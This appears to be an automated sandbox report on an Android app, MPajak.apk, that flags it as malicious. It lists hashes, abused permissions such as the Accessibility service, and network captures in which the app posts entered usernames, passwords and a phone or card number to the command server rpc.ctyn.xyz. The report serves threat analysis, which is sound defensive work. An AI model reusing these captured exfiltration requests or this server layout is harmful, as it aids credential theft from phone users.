Analysis
-
max time kernel
113s -
max time network
118s -
platform
android_x64 -
resource
android-33-x64-arm64-20240624-en -
resource tags
-
submitted
21/10/2024, 11:52 UTC
General
-
Target
MPajak.apk
-
Size
13.3MB
-
MD5
884b6cd60e352cf53578f50cdda39ad3
-
SHA1
ee017e9a61f08d0985ef063c2025c9c2876e0ea2
-
SHA256
61795af91d31cf452d602dd4ea32504fdee25f629804076f813b02b51c775617
-
SHA512
682fce76b43a7b16b4bb70aa4a87db900162e9603f6b8c76d3ce11e06638588a5790e556c3e20237eff8ce87dd979ac4cbafa793bce4470da57a11ff4e7c117e
-
SSDEEP
196608:yNpN6ujPb248uKxXAuUMZblnYhpq9OJMT2quVp5N7VKd1HzHkPq+G9oKkljberkA:+njCRxX3nYhMOJ8s7f7VOT1+/fwQDgB
Score
7/10
Malware Config
Signatures
-
Makes use of the framework's Accessibility service 4 TTPs 1 IoCs
Retrieves information displayed on the phone screen using AccessibilityService.
-
Queries account information for other applications stored on the device 1 TTPs 4 IoCs
Application may abuse the framework's APIs to collect account information stored on the device.
-
Queries information about running processes on the device 1 TTPs 4 IoCs
Application may abuse the framework's APIs to collect information about running processes on the device.
-
Acquires the wake lock 1 IoCs
-
Makes use of the framework's foreground persistence service 1 TTPs 1 IoCs
Application may abuse the framework's foreground service to continue running in the foreground.
-
Queries information about active data network 1 TTPs 1 IoCs
-
Schedules tasks to execute at a specified time 1 TTPs 2 IoCs
Application may abuse the framework's APIs to perform task scheduling for initial or recurring execution of malicious code.
-
Uses Crypto APIs (Might try to encrypt user data) 1 TTPs 4 IoCs
Processes
-
com.sextest.test1⤵
- Makes use of the framework's Accessibility service
- Queries account information for other applications stored on the device
- Queries information about running processes on the device
- Acquires the wake lock
- Makes use of the framework's foreground persistence service
- Queries information about active data network
- Schedules tasks to execute at a specified time
- Uses Crypto APIs (Might try to encrypt user data)
-
com.sextest.test:main1⤵
- Queries account information for other applications stored on the device
- Queries information about running processes on the device
- Schedules tasks to execute at a specified time
- Uses Crypto APIs (Might try to encrypt user data)
-
com.sextest.test:mr2_process1⤵
- Queries account information for other applications stored on the device
- Queries information about running processes on the device
- Uses Crypto APIs (Might try to encrypt user data)
-
com.sextest.test:fore_temp1⤵
- Queries account information for other applications stored on the device
- Queries information about running processes on the device
- Uses Crypto APIs (Might try to encrypt user data)
Network
-
DNSwww.baidu.comRemote address:1.1.1.1:53Requestwww.baidu.comIN AResponsewww.baidu.comIN CNAMEwww.a.shifen.comwww.a.shifen.comIN CNAMEwww.wshifen.comwww.wshifen.comIN A103.235.47.188www.wshifen.comIN A103.235.46.96 -
GEThttp://www.baidu.com/Remote address:103.235.47.188:80RequestGET / HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 1108
Content-Type: text/html
Server: bfe
Date: Mon, 21 Oct 2024 11:54:27 GMT
-
GEThttp://www.baidu.com/Remote address:103.235.47.188:80RequestGET / HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 1108
Content-Type: text/html
Server: bfe
Date: Mon, 21 Oct 2024 11:54:30 GMT
-
GEThttp://www.baidu.com/Remote address:103.235.47.188:80RequestGET / HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 1108
Content-Type: text/html
Server: bfe
Date: Mon, 21 Oct 2024 11:54:34 GMT
-
GEThttp://www.baidu.com/Remote address:103.235.47.188:80RequestGET / HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 1108
Content-Type: text/html
Server: bfe
Date: Mon, 21 Oct 2024 11:54:35 GMT
-
GEThttp://www.baidu.com/Remote address:103.235.47.188:80RequestGET / HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
Host: www.baidu.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 1108
Content-Type: text/html
Server: bfe
Date: Mon, 21 Oct 2024 11:54:35 GMT
-
DNSrcs-acs-tmo-us.jibe.google.comRemote address:1.1.1.1:53Requestrcs-acs-tmo-us.jibe.google.comIN AResponsercs-acs-tmo-us.jibe.google.comIN A216.239.36.155
-
DNSremoteprovisioning.googleapis.comRemote address:1.1.1.1:53Requestremoteprovisioning.googleapis.comIN AResponseremoteprovisioning.googleapis.comIN A142.250.187.202remoteprovisioning.googleapis.comIN A142.250.187.234remoteprovisioning.googleapis.comIN A142.250.200.10remoteprovisioning.googleapis.comIN A142.250.200.42remoteprovisioning.googleapis.comIN A172.217.16.234remoteprovisioning.googleapis.comIN A142.250.178.10remoteprovisioning.googleapis.comIN A216.58.201.106remoteprovisioning.googleapis.comIN A216.58.204.74remoteprovisioning.googleapis.comIN A216.58.213.10remoteprovisioning.googleapis.comIN A172.217.169.10remoteprovisioning.googleapis.comIN A216.58.212.234remoteprovisioning.googleapis.comIN A142.250.179.234remoteprovisioning.googleapis.comIN A172.217.169.74remoteprovisioning.googleapis.comIN A172.217.169.42remoteprovisioning.googleapis.comIN A142.250.180.10
-
DNSremoteprovisioning.googleapis.comRemote address:1.1.1.1:53Requestremoteprovisioning.googleapis.comIN A
-
DNSrpc.ctyn.xyzRemote address:1.1.1.1:53Requestrpc.ctyn.xyzIN AResponserpc.ctyn.xyzIN A104.21.87.253rpc.ctyn.xyzIN A172.67.149.70
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:55:29 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: hUYXk00fDsYtsfx1Uu0F5Y9vfWfN6uuF
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FnF72PetYKBPScyBQD3AI6Mxwy8CLE%2BcwVhBO6%2FS2i0txiV1ZLv0NvXXmfohTkGjrPBhjcL9BLIWchPKYSFjEmvZq%2F12%2FAPgGg7ngvLhGLQ0jNrnW6SjKdFpf8as6k%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d610f0febd471b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=34807&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3638&recv_bytes=1511&delivery_rate=118917&cwnd=254&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=580&x=0"
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:55:30 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: qm1mxhQoHqvTDUF7nd4DH2xUExEh19Vc
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAp7uEOG%2Fx1n6Py%2B%2FKnaU0U3punLHGnsSWXKW2RFZDTMWIVK9GKZFsj2Di2zrWxj8nlfWXAcPSC0sP0VljSZZFNuMVF6Rx4HJ%2F6GJztp90212QXJSxS9VXGnQQHZyT4%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d610f1affa471b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=34782&sent=11&recv=10&lost=0&retrans=0&sent_bytes=4639&recv_bytes=2207&delivery_rate=118917&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=2105&x=0"
-
POSThttps://rpc.ctyn.xyz/x/command-report?state=0&ty=0Remote address:104.21.87.253:443RequestPOST /x/command-report?state=0&ty=0 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 55
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:55:39 GMT
content-type: application/json; charset=UTF-8
content-length: 131
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: QvbHyELVpNU9QEf5PFmKxaCIf3wP2HKx
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5ddRNsIek0Pnk2AD364M82fOD0qlgdeck7AZEuL%2FvHoqtfKhZLX%2BOqVixZKVfJOtr766xt7QjNqSpg%2BNnp7bTmVAv6QkGmLAQyzcbe0VZVX8%2B%2BujdhtNcZhOmdctoU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d610f523e3871b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=35606&sent=16&recv=13&lost=0&retrans=0&sent_bytes=5335&recv_bytes=2466&delivery_rate=118917&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=10943&x=0"
-
POSThttps://rpc.ctyn.xyz/x/command-report?state=0&ty=3Remote address:104.21.87.253:443RequestPOST /x/command-report?state=0&ty=3 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 55
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:55:39 GMT
content-type: application/json; charset=UTF-8
content-length: 131
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: F0yB16Ze6WN6Acsxgg8HJnb6azrJEJPb
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4xo4%2FkWFgjYi5awUzjWH5I95cK9FlXi%2Bntx9WdvudKCgOk8gJssG%2BhRecGre975qHSfXdvkmUZzgyTxAeg%2BSDcYS8sbczCRkh7na73ajdpd%2BzO6R60bIt9jw4s%2Fc%2FQ%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d610f526e6771b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=35525&sent=19&recv=14&lost=0&retrans=0&sent_bytes=5992&recv_bytes=2466&delivery_rate=118917&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=11243&x=0"
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:07 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: lf4RF6lpPezPrsmcFWGzQIX9u55SzJk2
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NITrkgyKNaPj7e%2Bj%2BNENfW24gAkQyD5vrPAJyoX%2FsxAhrg13gbjPVePKj4Gjc%2BuUsZ%2F7qP0WegwH7VF%2BuIhDMVz4CSj7%2F5EwFcjIh8kbYc8PO575yiWmiVmEzHNxZu8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d610ffffabf71b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=40996&sent=23&recv=17&lost=0&retrans=0&sent_bytes=6624&recv_bytes=3162&delivery_rate=118917&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=38778&x=0"
-
POSThttps://rpc.ctyn.xyz/x/command-report?state=0&ty=0Remote address:104.21.87.253:443RequestPOST /x/command-report?state=0&ty=0 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 55
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:09 GMT
content-type: application/json; charset=UTF-8
content-length: 131
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: FzFoVzC03xmOBLtqFfbABwFqkRnBdhRt
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgmAPhGoodZil0YDhRzR7ZBCcIAGdb%2FrqV9wYv%2BYtnirmTpkhpYtuK4IO%2BhEpwKwlb4mBK57zSV6UIoGmBEkRSjrYWPY1V2IKuzGTNu4TsQkAAovfyA1vU3CKIyUq5I%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d61100dcacf71b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39754&sent=28&recv=22&lost=0&retrans=0&sent_bytes=7324&recv_bytes=3418&delivery_rate=118917&cwnd=4&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=40973&x=0"
-
POSThttps://rpc.ctyn.xyz/x/command-report?state=0&ty=3Remote address:104.21.87.253:443RequestPOST /x/command-report?state=0&ty=3 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 55
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:09 GMT
content-type: application/json; charset=UTF-8
content-length: 131
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: jyR6wCLgStMFkqn2Ds9upj9g32W8EQOz
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1QYNqTOQ1GHHu74xqLPrtouiAJqied%2FETOoqi%2FVirkznRDEF5fULuoaDIRTDvZR%2BgmP8gxswnCx6gF4K05NLnYNDjXbWYezJKZixyVFPw3mGs5IACLUexmsKskNTdU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d61100d8a8171b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39754&sent=31&recv=22&lost=0&retrans=0&sent_bytes=8199&recv_bytes=3418&delivery_rate=118917&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=40973&x=0"
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:12 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: 3MfeucffqBpDOc0RatJeOsqoLviHoizR
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6fnrzPIBNtC%2BPJVKDV9Jme7zycxRU8UsdeLbok239BvxGJ8rlqNxoMYDyWhCYcH%2B7J%2BXrhB12IdhZpu9uuTVpR3VUdiPHK8%2FUsdKB3URlxQv3kinFVLPIfJOczitBc%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d611020fb0371b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36770&sent=35&recv=29&lost=0&retrans=0&sent_bytes=8827&recv_bytes=4114&delivery_rate=231650&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=44037&x=0"
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:13 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: FN6V6Wu0VfVC8V2CUB1CYZEfMICbSK3G
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbx1btV3%2FAQ200ehjS9InLS0OB0Yd6t1Qfb2Du23f1iXY8cWCk%2BmfpTdPXSnOgCCB%2B5SuZh3kaSOoJ7ZKKKzkU3iVJUAt38o1lwu1GHkh%2FopmDfY6IGpgQiVcTmHIcc%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d611028ab5671b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36472&sent=39&recv=33&lost=0&retrans=0&sent_bytes=9573&recv_bytes=4810&delivery_rate=231650&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=45277&x=0"
-
POSThttps://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13Remote address:104.21.87.253:443RequestPOST /x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13 HTTP/2.0
host: rpc.ctyn.xyz
version: 09221307-Rebuild
type: encryption
content-type: application/json; charset=UTF-8
content-length: 439
accept-encoding: gzip
user-agent: okhttp/4.11.0
ResponseHTTP/2.0 200
date: Mon, 21 Oct 2024 11:56:14 GMT
content-type: application/json; charset=UTF-8
content-length: 172
access-control-allow-methods: POST,GET,OPTIONS,DELETE,token
access-control-allow-origin: *
content-encoding: gzip
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-request-id: obO3AMto09cqcANzSX387iUJmWACU5ev
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qDUdQBvnR7S1w6V26b79dpk6ZiCAAxOeItQLuuhLlEhMBK96a1SjKJyU9qGFW273xUDeOtKFbLdZQzamideiIKh7FhnFYSKkH5rMssNNC6T4doXrQEeo2xOSpiKBaY%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 8d6110302b6771b1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36502&sent=43&recv=37&lost=0&retrans=0&sent_bytes=10267&recv_bytes=5506&delivery_rate=231650&cwnd=257&unsent_bytes=0&cid=a1a5a2b611b924b5&ts=46457&x=0"
-
142.250.187.196:443www.google.comtls -
103.235.47.188:80http://www.baidu.com/http
HTTP Request
GET http://www.baidu.com/HTTP Response
200 -
103.235.47.188:80http://www.baidu.com/http
HTTP Request
GET http://www.baidu.com/HTTP Response
200 -
103.235.47.188:80http://www.baidu.com/http
HTTP Request
GET http://www.baidu.com/HTTP Response
200 -
103.235.47.188:80http://www.baidu.com/http
HTTP Request
GET http://www.baidu.com/HTTP Response
200 -
216.58.212.238:443tls, https
-
216.58.212.238:443android.apis.google.comtls
-
103.235.47.188:80http://www.baidu.com/http
HTTP Request
GET http://www.baidu.com/HTTP Response
200 -
216.239.36.155:443rcs-acs-tmo-us.jibe.google.comtls
-
172.64.41.3:443tls, https
-
172.64.41.3:443chrome.cloudflare-dns.comtls
-
142.250.187.196:443www.google.comtls
-
172.217.169.68:443tls, https
-
172.217.169.68:443www.google.comtls
-
142.250.187.227:443tls, https
-
104.21.87.253:443https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13tls, http2
HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081311157432&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%40123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%40123&v=13HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/command-report?state=0&ty=0HTTP Request
POST https://rpc.ctyn.xyz/x/command-report?state=0&ty=3HTTP Response
200HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/command-report?state=0&ty=0HTTP Request
POST https://rpc.ctyn.xyz/x/command-report?state=0&ty=3HTTP Response
200HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13HTTP Response
200HTTP Request
POST https://rpc.ctyn.xyz/x/login?admin_id=1.0&bank_name=unknow&card=081211456789&device=aa52373681d6441c&from_source=idnctmpajak&idencard=unknow&is_device=0.0&model=google%3BPixel%202%3B13%3BAndroid%3B13&password=Wokwok%23123&phone=unknow&source=android&tm=Rebuild-202409221306&username=Wokwok%23123&v=13HTTP Response
200
-
224.0.0.251:5353 -
142.250.187.196:443https
-
1.1.1.1:53www.baidu.comdns
DNS Request
www.baidu.com
DNS Response
103.235.47.188103.235.46.96
-
216.58.212.238:443https
-
1.1.1.1:53rcs-acs-tmo-us.jibe.google.comdns
DNS Request
rcs-acs-tmo-us.jibe.google.com
DNS Response
216.239.36.155
-
1.1.1.1:53remoteprovisioning.googleapis.comdns
DNS Request
remoteprovisioning.googleapis.com
DNS Request
remoteprovisioning.googleapis.com
DNS Response
142.250.187.202142.250.187.234142.250.200.10142.250.200.42172.217.16.234142.250.178.10216.58.201.106216.58.204.74216.58.213.10172.217.169.10216.58.212.234142.250.179.234172.217.169.74172.217.169.42142.250.180.10
-
172.64.41.3:443https
-
142.250.187.196:443https
-
1.1.1.1:53rpc.ctyn.xyzdns
DNS Request
rpc.ctyn.xyz
DNS Response
104.21.87.253172.67.149.70
MITRE ATT&CK Mobile v15
